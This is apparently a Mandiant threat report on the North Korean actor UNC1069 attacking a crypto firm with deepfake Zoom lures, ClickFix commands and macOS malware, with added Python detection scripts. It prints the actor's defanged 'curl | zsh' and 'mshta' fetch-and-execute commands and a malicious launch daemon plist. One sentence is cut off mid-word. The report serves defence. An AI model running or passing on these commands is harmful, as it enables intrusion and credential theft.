- What: UNC1069, a North Korean threat actor, is targeting the cryptocurrency sector using new malware and AI-enabled social engineering techniques.
- Impact: FinTech entities within the cryptocurrency sector are at risk of data theft and compromise via compromised Telegram accounts and fake Zoom meetings.
# UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering

February 9, 2026
Mandiant
Written by: Ross Inman, Adrian Hernandez

## Introduction

North Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi) verticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to UNC1069, a financially motivated threat actor active since at least 2019. This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH.

The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported use of AI-generated video to deceive the victim. These tactics build on a shift first documented in the November 2025 publication GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools, where Google Threat Intelligence Group (GTIG) identified UNC1069's transition from using AI for simple productivity gains to deploying novel AI-enabled lures in active operations.

The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft. While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion of its capabilities.

## Initial Vector and Social Engineering

The victim was contacted via Telegram from the account of an executive at a cryptocurrency company; UNC1069 had compromised that account.
Mandiant identified posts by the true owner of the account, made from another social media profile, warning their contacts that their Telegram account had been hijacked; however, Mandiant was not able to verify these claims or establish contact with this executive. UNC1069 engaged the victim and, after building rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link directed to a spoofed Zoom meeting hosted on the threat actor's infrastructure, zoom[.]uswe05[.]us. The victim reported that during the call they were presented with a video of the CEO of another cryptocurrency company that appeared to be a deepfake.

While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the ruse aligns with activity previously tracked by GTIG. As detailed in our November 2025 research, UNC1069 has successfully leveraged deepfake images and video lures impersonating industry figures to distribute its BIGMACHO backdoor. In those previous campaigns, the actor prompted targets to install a malicious "Zoom SDK," a precursor to the technical troubleshooting lure observed in this intrusion. Lures of this kind require source images or video of the person being impersonated, indicating open-source intelligence (OSINT) collection in preparation for the social engineering attack. This hypothesis is reinforced by the original profile of the individual impersonated during the attack reporting an account takeover by an unknown adversary.

Once in the "meeting," the fake video call was used to give the victim the impression that they were experiencing audio issues. The threat actor used this pretext to conduct a ClickFix attack: a technique in which the threat actor directs the user to run "troubleshooting" commands on their own system to address a purported technical issue.
The recovered web page provided two sets of commands to be run for "troubleshooting": one for macOS systems and one for Windows systems. Embedded within the string of commands was a single command that initiated the infection chain.

Mandiant has observed UNC1069 employing these techniques against both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives. This includes the use of fake Zoom meetings and the threat actor's known use of AI tools to edit images or video during the social engineering stage. UNC1069 is known to use tools like Gemini to develop tooling, conduct operational research, and assist during the reconnaissance stages, as reported by GTIG. Additionally, Kaspersky recently reported that BlueNoroff, a threat actor that overlaps with UNC1069, is also using GPT-4o models to modify images, indicating adoption of generative AI tools and integration of AI into the adversary lifecycle.

## Infection Chain

In the incident response engagement performed by Mandiant, the victim executed the "troubleshooting" commands shown in Figure 1, which led to the initial infection of the macOS device.
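The thing to key on in the command blocks that follow (Figures 1 and 2) is that exactly one line fetches a URL and executes what comes back, while the lines around it are legitimate diagnostics that make the block look like real troubleshooting. The routine below is an added example, not part of Mandiant's report or tooling: it embeds both blocks verbatim (defanged as the report prints them), finds the remote-execution line in each, and refangs the URL so it can be matched against indicators. The fetcher and interpreter lists are my own choice and are not exhaustive.

```python
import re

# The two "troubleshooting" blocks from Figures 1 and 2, exactly as the report
# defangs them (hxxp, [.]).
MACOS_BLOCK = """\
system_profiler SPAudioData
softwareupdate --evaluate-products --products audio --agree-to-license
curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh
system_profiler SPSoundCardData
softwareupdate --evaluate-products --products soundcard
system_profiler SPSpeechData
softwareupdate --evaluate-products --products speech --agree-to-license
"""

WINDOWS_BLOCK = """\
setx audio_volume 100
pnputil /enum-devices /connected /class "Audio"
mshta hxxp://mylingocoin[.]com/audio/fix/6454694440
wmic sounddev get Caption, ProductName, DeviceID, Status
msdt -id AudioPlaybackDiagnostic
exit
"""

# Programs that pull content off the network, and programs that will run what
# they are handed. These lists are my choice, not a complete inventory.
FETCHERS = {"curl", "wget", "certutil", "bitsadmin", "iwr", "invoke-webrequest", "powershell"}
INTERPRETERS = {"zsh", "bash", "sh", "osascript", "python", "python3", "powershell", "cmd", "iex"}
SELF_EXECUTING = {"mshta"}  # fetches a URL and executes it in a single step
URL_RE = re.compile(r"\bh[xt]{2}ps?://[^\s|\"']+", re.IGNORECASE)  # http(s) or defanged hxxp(s)


def refang(url: str) -> str:
    """hxxp://x[.]y -> http://x.y so the indicator can be matched elsewhere."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE).replace("[.]", ".")


def _argv0(stage: str) -> str:
    """Lower-cased program name of one pipeline stage, or '' if empty."""
    parts = stage.split()
    return parts[0].strip("\"'").lower() if parts else ""


def is_remote_exec(cmd: str) -> bool:
    """True when one command line fetches a URL and executes the result:
    either a fetcher piped into an interpreter (curl ... | zsh) or a tool
    that does both itself (mshta URL)."""
    if not URL_RE.search(cmd):
        return False
    stages = [_argv0(s) for s in cmd.split("|")]
    if stages[0] in SELF_EXECUTING:
        return True
    return stages[0] in FETCHERS and any(s in INTERPRETERS for s in stages[1:])


def triage(block: str) -> list[dict]:
    """One record per line that would execute remote content. Every other line
    is left alone on purpose: the benign diagnostics are camouflage for a
    single dangerous command."""
    hits = []
    for lineno, raw in enumerate(block.splitlines(), 1):
        line = raw.strip()
        if line and is_remote_exec(line):
            hits.append({"line": lineno, "command": line,
                         "url": refang(URL_RE.search(line).group(0))})
    return hits


if __name__ == "__main__":
    for name, block in (("macOS", MACOS_BLOCK), ("Windows", WINDOWS_BLOCK)):
        for hit in triage(block):
            print(f"{name}: line {hit['line']} executes {hit['url']}: {hit['command']}")
```

The same routine can be pointed at shell history, clipboard contents, or a page captured from the lure site; a single `curl | zsh` or `mshta URL` among otherwise harmless commands is the ClickFix signature, and the decoy lines should not be used to decide the block is benign.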
```
system_profiler SPAudioData
softwareupdate --evaluate-products --products audio --agree-to-license
curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh
system_profiler SPSoundCardData
softwareupdate --evaluate-products --products soundcard
system_profiler SPSpeechData
softwareupdate --evaluate-products --products speech --agree-to-license
```

Figure 1: Attacker commands shared during the social engineering stage

A set of "troubleshooting" commands targeting Windows operating systems was also recovered from the fake Zoom call webpage:

```
setx audio_volume 100
pnputil /enum-devices /connected /class "Audio"
mshta hxxp://mylingocoin[.]com/audio/fix/6454694440
wmic sounddev get Caption, ProductName, DeviceID, Status
msdt -id AudioPlaybackDiagnostic
exit
```

Figure 2: Attacker commands shared when Windows is detected

Only one command in each block does anything harmful: on macOS, `curl ... | zsh` pipes a remote script directly into a shell; on Windows, `mshta` fetches and executes remote content. The surrounding `system_profiler`, `softwareupdate`, `pnputil`, `wmic` and `msdt` invocations are legitimate diagnostics that make the block look like genuine troubleshooting.

Evidence of AppleScript execution was recorded immediately after the start of the infection chain; however, the contents of the AppleScript payload could not be recovered from the forensic artifacts resident on the system. Following the AppleScript execution, a malicious Mach-O binary was deployed to the system. The first malicious executable deployed was a packed backdoor tracked by Mandiant as WAVESHAPER. WAVESHAPER served as a conduit to deploy a downloader tracked by Mandiant as HYPERCALL, as well as additional tooling that considerably expanded the adversary's foothold on the system. Mandiant observed three uses of the HYPERCALL downloader during the intrusion:

- Execute a follow-on backdoor component, tracked by Mandiant as HIDDENCALL, which provided hands-on-keyboard access to the compromised system
- Deploy another downloader, tracked by Mandiant as SUGARLOADER
- Facilitate the execution of a toehold backdoor, tracked by Mandiant as SILENCELIFT, which beacons system information to a command-and-control (C2 or C&C) server

Figure 3: Attack chain

## XProtect

XProtect is the built-in anti-virus technology included in macOS.
XProtect originally relied on signature-based detection only; the XProtect Behavioral Service (XBS) was later introduced to add behavior-based detection. If a program violates one of the behavioral rules defined by Apple, information about the offending program is recorded in the XProtect Database (XPdb), a SQLite 3 database located at /var/protected/xprotect/XPdb. Unlike signature-based detections, behavioral detections do not cause XProtect to block execution or quarantine the offending program.

Mandiant recovered from the XPdb the file paths and SHA256 hashes of programs that had violated one or more XBS rules. This included information on malicious programs that had since been deleted and could not be recovered. Because the XPdb also records a timestamp for each detection, Mandiant could determine the sequence of events associated with malware execution, from the initial infection chain to the next-stage malware deployments, despite no endpoint detection and response (EDR) product being present on the compromised system.

## Data Harvesting and Persistence

Mandiant identified two distinct data miners deployed by the threat actor during their access period: DEEPBREATH and CHROMEPUSH.

DEEPBREATH, a data miner written in Swift, was deployed via HIDDENCALL, the follow-on backdoor component to HYPERCALL. DEEPBREATH manipulates the Transparency, Consent, and Control (TCC) database to gain broad file system access, enabling it to steal:

- Credentials from the user's Keychain
- Browser data from Chrome, Brave, and Edge
- User data from two different versions of Telegram
- User data from Apple Notes

DEEPBREATH stages the targeted data in a temporary folder, compresses it into a ZIP archive, and exfiltrates the archive to a remote server via the curl command-line utility.

Mandiant also identified that HYPERCALL deployed an additional malware loader, tracked as part of the SUGARLOADER code family.
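Two of the artifacts above are SQLite databases that an analyst without EDR will want to read: the XPdb for the detection timeline, and the TCC database for the access grants DEEPBREATH is described as tampering with. The script below is an added example, not part of Mandiant's report or tooling. The report does not document the XPdb schema and neither do I, so the timeline query enumerates tables and columns at run time and picks the timestamp, path and hash columns by name; the constructed in-memory databases, their table and column names, and the sample rows exist only so the example runs offline. For TCC, the `access` table columns `service`, `client`, `auth_value` and `last_modified` are those of the system TCC.db on macOS 11 and later (`auth_value` 2 meaning allowed; older releases used an `allowed` column instead), which is worth confirming against the release at hand.

```python
import sqlite3
from datetime import datetime, timezone

# ---- XPdb timeline ---------------------------------------------------------
# The report says XPdb records, per behavioral detection, the offending
# program's path, its SHA256 and a timestamp, but not how. Nothing here
# hard-codes table or column names: the schema is read from the database.

def _columns(con, table):
    return [row[1] for row in con.execute(f'PRAGMA table_info("{table}")')]


def _pick(cols, *needles):
    """First column whose lower-cased name contains any needle, else None."""
    for c in cols:
        if any(n in c.lower() for n in needles):
            return c
    return None


def xpdb_timeline(con):
    """(timestamp, table, path, sha256) for every row of every table that has a
    timestamp-like column, oldest first. Rows sort on the raw stored value, so
    normalize epochs first if different tables use different ones."""
    events = []
    for (table,) in con.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        cols = _columns(con, table)
        ts = _pick(cols, "time", "date")
        if ts is None:
            continue
        path = _pick(cols, "path", "file", "name") or ts
        sha = _pick(cols, "sha", "hash")
        sel = ", ".join(f'"{c}"' for c in (ts, path, sha) if c)
        for row in con.execute(f'SELECT {sel} FROM "{table}"'):
            events.append((row[0], table, row[1], row[2] if sha else None))
    return sorted(events, key=lambda e: e[0])


def build_sample_xpdb():
    """Constructed stand-in for XPdb: the table and column names are an
    assumption made only so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE detections (id INTEGER PRIMARY KEY, detect_time REAL, "
                "path TEXT, sha256 TEXT, rule TEXT)")
    con.executemany(
        "INSERT INTO detections (detect_time, path, sha256, rule) VALUES (?, ?, ?, ?)",
        [
            # path from Figure 4 of the report; hash, time and rule name are constructed
            (1770000300.0, "/Library/OSRecovery/SystemUpdater", "b" * 64, "rule_b"),
            # entirely constructed earlier event, inserted out of order on purpose
            (1770000010.0, "/Users/victim/Downloads/fix", "a" * 64, "rule_a"),
        ],
    )
    con.commit()
    return con


# ---- TCC grants ------------------------------------------------------------
# Full Disk Access is the broad file-system grant; anything holding it that the
# operator did not approve is a lead.
FULL_DISK_ACCESS = "kTCCServiceSystemPolicyAllFiles"


def tcc_full_disk_grants(con):
    """(client, granted-at as ISO-8601 UTC) for every allowed Full Disk Access row."""
    rows = con.execute(
        "SELECT client, auth_value, last_modified FROM access "
        "WHERE service = ? ORDER BY last_modified",
        (FULL_DISK_ACCESS,),
    )
    return [
        (client, datetime.fromtimestamp(modified, tz=timezone.utc).isoformat())
        for client, auth_value, modified in rows
        if auth_value == 2
    ]


def build_sample_tcc():
    """Constructed TCC.db carrying only the columns the query uses."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
                "auth_value INTEGER, last_modified INTEGER)")
    con.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?)", [
        (FULL_DISK_ACCESS, "com.apple.Terminal", 0, 2, 1769990000),           # constructed: operator-approved
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 1769995000),                # constructed: other service
        (FULL_DISK_ACCESS, "/Users/victim/Library/.cache/helper", 1, 2, 1770000200),  # constructed: unexpected
        (FULL_DISK_ACCESS, "com.example.denied", 0, 0, 1770000300),           # constructed: denied
    ])
    con.commit()
    return con


if __name__ == "__main__":
    # On a live system open read-only, e.g. sqlite3.connect(
    #   "file:/var/protected/xprotect/XPdb?mode=ro", uri=True), and the same for
    #   /Library/Application Support/com.apple.TCC/TCC.db.
    for event in xpdb_timeline(build_sample_xpdb()):
        print("xpdb", *event)
    for grant in tcc_full_disk_grants(build_sample_tcc()):
        print("tcc", *grant)
```

Both databases are SIP-protected on a live host, so in practice they are read from a forensic image or after copying with elevated privileges; open the copies read-only as shown so the evidence is not modified.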
A persistence mechanism was installed for SUGARLOADER in the form of a launch daemon, which configured the system to execute the malware during the macOS startup process. The launch daemon was configured through a property list (plist) file, /Library/LaunchDaemons/com.apple.system.updater.plist. The contents of the launch daemon plist file are provided in Figure 4.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.system.updater</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Library/OSRecovery/SystemUpdater</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <false/>
    <key>ExitTimeOut</key>
    <integer>10</integer>
</dict>
</plist>
```

Figure 4: Launch daemon plist configured to execute SUGARLOADER

Two details make this plist stand out on inspection: the label sits in Apple's com.apple namespace, yet the file lives in /Library/LaunchDaemons rather than /System/Library/LaunchDaemons where Apple's own daemons ship, and the program it runs, /Library/OSRecovery/SystemUpdater, is outside any Apple-owned directory.

The SUGARLOADER sample recovered during the investigation did not have any internal f
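A triage routine for launchd persistence, added here as an example rather than as part of Mandiant's report or tooling: it parses Figure 4 with the standard library and applies the two signals visible in it, an Apple-namespaced label in a third-party LaunchDaemons directory and a program path outside Apple-owned locations, plus a check for programs in user-writable paths. The benign comparison plist, the directory prefix lists and the `scan_directory` helper are my own assumptions.

```python
import plistlib
import sys
from pathlib import Path

# Figure 4 from the report.
FIGURE4_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.system.updater</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Library/OSRecovery/SystemUpdater</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <false/>
    <key>ExitTimeOut</key>
    <integer>10</integer>
</dict>
</plist>
"""

# Constructed benign third-party daemon for comparison; not from the report.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.agent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Library/Application Support/Example/agent</string>
        <string>--daemon</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
"""

# Where Apple's own binaries live; an Apple-looking label running from anywhere
# else is a red flag. The list is my assumption, not an Apple-published one.
APPLE_BINARY_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/", "/Library/Apple/")
# Locations an unprivileged user or a dropper can write to.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/")


def assess_launchd_plist(data: bytes, directory: str) -> list[str]:
    """Reasons a launchd plist found in `directory` looks like malicious
    persistence; an empty list means nothing stood out."""
    p = plistlib.loads(data)
    label = str(p.get("Label", ""))
    args = p.get("ProgramArguments") or []
    program = str(p.get("Program") or (args[0] if args else ""))
    reasons = []
    apple_label = label.startswith("com.apple.")
    if apple_label and not directory.startswith("/System/"):
        reasons.append(f"label {label!r} uses Apple's namespace but lives in {directory}, "
                       "not /System/Library")
    if apple_label and not program.startswith(APPLE_BINARY_PREFIXES):
        reasons.append(f"label {label!r} runs non-Apple binary {program!r}")
    if program.startswith(WRITABLE_PREFIXES):
        reasons.append(f"program {program!r} is in a user-writable location")
    return reasons


def scan_directory(directory: str) -> dict[str, list[str]]:
    """Assess every .plist in a LaunchDaemons/LaunchAgents directory; a file
    that will not parse is reported too, since that is itself unusual."""
    findings = {}
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            reasons = assess_launchd_plist(path.read_bytes(), directory)
        except Exception as exc:
            reasons = [f"could not parse: {exc}"]
        if reasons:
            findings[str(path)] = reasons
    return findings


if __name__ == "__main__":
    for name, blob in (("figure4", FIGURE4_PLIST), ("benign", BENIGN_PLIST)):
        print(name, assess_launchd_plist(blob, "/Library/LaunchDaemons") or "clean")
    for d in sys.argv[1:] or ["/Library/LaunchDaemons", "/Library/LaunchAgents"]:
        for path, reasons in scan_directory(d).items():
            print(path, *reasons, sep="\n  ")
```

Run without arguments it reports on the two embedded plists and then on the host's /Library/LaunchDaemons and /Library/LaunchAgents; pass one or more directories to scan a mounted image instead. The label and path heuristics are deliberately simple, so treat a hit as a lead to verify (code signature, file hash against the XPdb, creation time) rather than as a verdict.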